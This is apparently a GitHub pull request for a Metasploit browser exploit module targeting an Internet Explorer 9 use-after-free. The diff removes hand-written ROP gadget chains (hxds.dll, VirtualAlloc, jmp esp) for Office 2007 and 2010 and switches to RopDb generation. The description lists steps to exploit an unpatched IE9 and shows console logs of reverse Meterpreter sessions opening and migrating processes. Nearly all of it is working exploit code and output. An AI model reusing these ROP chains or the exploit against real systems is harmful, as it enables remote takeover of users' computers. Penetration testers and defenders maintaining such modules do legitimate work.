### PR TITLE
Use RopDB on ie_setmousecapture_uaf 

### DIFF
--- a/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb
+++ b/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb
@@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::RopDb
 
   def initialize(info={})
     super(update_info(info,
@@ -117,82 +118,33 @@ class Metasploit3 < Msf::Exploit::Remote
   def get_payload(rop_dll)
     code = payload.encoded
     rop  = ''
-    p    = ''
+    alignment = ''
 
     case rop_dll
     when :office2007
-      rop = 
+      alignment =
       [
         junk,        # Alignment
-        0x51c46f91,  # POP EBP # RETN [hxds.dll] 
-        0x51c46f91,  # skip 4 bytes [hxds.dll]
-        0x51c35a4d,  # POP EBX # RETN [hxds.dll] 
-        0xffffffff,
-        0x51bd90fd,  # INC EBX # RETN [hxds.dll]
-        0x51bd90fd,  # INC EBX # RETN [hxds.dll]
-        0x51bfa98e,  # POP EDX # RETN [hxds.dll] 
-        0xffffefff,
-        0x51c08b65,  # XCHG EAX, EDX # RETN [hxds.dll]
-        0x51c1df88,  # NEG EAX # RETN [hxds.dll]
-        0x51c55c45,  # DEC EAX, RETN [hxds.dll]
-        0x51c08b65,  # XCHG EAX, EDX # RETN [hxds.dll]
-        0x51c4c17c,  # POP ECX # RETN [hxds.dll]
-        0xffffffc0,
-        0x51bfbaae,  # XCHG EAX, ECX # RETN [hxds.dll]
-        0x51c1df88,  # NEG EAX # RETN [hxds.dll]
-        0x51bfbaae,  # XCHG EAX, ECX # RETN [hxds.dll]
-        0x51c05766,  # POP EDI # RETN [hxds.dll] 
-        0x51bfbaaf,  # RETN (ROP NOP) [hxds.dll]
-        0x51c2e77d,  # POP ESI # RETN [hxds.dll] 
-        0x51bfc840,  # JMP [EAX] [hxds.dll]
-        0x51c05266,  # POP EAX # RETN [hxds.dll] 
-        0x51bd115c,  # ptr to &VirtualAlloc() [IAT hxds.dll]
-        0x51bdf91f,  # PUSHAD # RETN [hxds.dll] 
-        0x51c4a9f3,  # ptr to 'jmp esp' [hxds.dll]
-     ].pack("V*")
+      ].pack("V*")
+
+      rop = generate_rop_payload('hxds', code, { 'target'=>'2007' })
 
     when :office2010
-      rop = 
+      alignment =
       [
         # 4 dword junks due to the add esp in stack pivot
         junk,
         junk,
         junk,
         junk,
-        0x51c41953,  # POP EBP # RETN [hxds.dll]
-        0x51be3a03,  # RETN (ROP NOP) [hxds.dll]
-        0x51c41953,  # skip 4 bytes [hxds.dll]
-        0x51c4486d,  # POP EBX # RETN [hxds.dll] 
-        0xffffffff,
-        0x51c392d8,  # EXCHG EAX, EBX # RETN [hxds.dll]
-        0x51bd1a77,  # INC EAX # RETN [hxds.dll]
-        0x51bd1a77,  # INC EAX # RETN [hxds.dll]
-        0x51c392d8,  # EXCHG EAX, EBX # RETN [hxds.dll]
-        0x51bfa298,  # POP EDX # RETN [hxds.dll] 
-        0xffffefff,
-        0x51bea84d,  # XCHG EAX, EDX # RETN [hxds.dll]
-        0x51bf5188,  # NEG EAX # POP ESI # RETN [hxds.dll]
-        junk,
-        0x51bd5382,  # DEC EAX # RETN [hxds.dll]
-        0x51bea84d,  # XCHG EAX, EDX # RETN [hxds.dll]
-        0x51c1f094,  # POP ECX # RETN [hxds.dll] 
-        0xffffffc0,
-        0x51be5986,  # XCHG EAX, ECX # RETN [hxds.dll]
-        0x51bf5188,  # NEG EAX # POP ESI # RETN [hxds.dll]
-        junk,
-        0x51be5986,  # XCHG EAX, ECX # RETN [hxds.dll]
-        0x51bf1ff0,  # POP EDI # RETN [hxds.dll] 
-        0x51bd5383,  # RETN (ROP NOP) [hxds.dll]
-        0x51c07c8b,  # POP ESI # RETN [hxds.dll] 
-        0x51bfc7cb,  # JMP [EAX] [hxds.dll]
-        0x51c44707,  # POP EAX # RETN [hxds.dll] 
-        0x51bd10bc,  # ptr to &VirtualAlloc() [IAT hxds.dll]
-        0x51c3604e,  # PUSHAD # RETN [hxds.dll] 
-        0x51c541ef,  # ptr to 'jmp esp' [hxds.dll]
+        0x51bf518b, # ret
+        junk # due to the ret 4 on the stack pivot
       ].pack("V*")
+
+      rop = generate_rop_payload('hxds', code, { 'target'=>'2010' })
     end
 
-    p = rop + code
+    p = alignment + rop + code
     p
   end
 


### PR DESCRIPTION
After #2442, it can be ported to use ropdb.

Steps to veryfy:
- [x] Install Windows 7 SP1 on a test machine
- [x] Install IE9 (no patches!) on the test machine
- [x] Install Office 2007 or Office 2010 on the test machine
- [x] start msfconsole, use modules/exploits/windows/browser/ie_setmousecapture_uaf and exploit
- [x] Point the IE9 browser to the url provided for the exploit, shell should be provided.

Sample:
- Office 2007

```
msf exploit(ie_setmousecapture_uaf) > rexploit
[*] Stopping existing job...

[*] Server stopped.
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.240.1:4444 
[*] Using URL: http://172.16.240.1:8080/F9m7Sgt
[*] Server started.
msf exploit(ie_setmousecapture_uaf) > [*] 172.16.240.142   ie_setmousecapture_uaf - Checking target requirements...
[*] 172.16.240.142   ie_setmousecapture_uaf - Using Office 2007 ROP chain
[*] 172.16.240.142   ie_setmousecapture_uaf - Using Office 2007 ROP chain
[*] 172.16.240.142   ie_setmousecapture_uaf - Using Office 2007 ROP chain
[*] Sending stage (770048 bytes) to 172.16.240.142
[*] Meterpreter session 1 opened (172.16.240.1:4444 -> 172.16.240.142:49160) at 2013-10-01 12:55:36 -0500
[*] Session ID 1 (172.16.240.1:4444 -> 172.16.240.142:49160) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: rundll32.exe (3880)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3948


```
- Office 2010

```
msf exploit(ie_setmousecapture_uaf) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.240.1:4444 
[*] Using URL: http://172.16.240.1:8080/kPMnEvkatPl
[*] Server started.
msf exploit(ie_setmousecapture_uaf) > [*] 172.16.240.142   ie_setmousecapture_uaf - Checking target requirements...
[*] 172.16.240.142   ie_setmousecapture_uaf - Using Office 2010 ROP chain
[*] Sending stage (770048 bytes) to 172.16.240.142
[*] Meterpreter session 2 opened (172.16.240.1:4444 -> 172.16.240.142:49172) at 2013-10-01 13:19:29 -0500
[*] Session ID 2 (172.16.240.1:4444 -> 172.16.240.142:49172) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: rundll32.exe (624)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3884
[+] Successfully migrated to process 


```
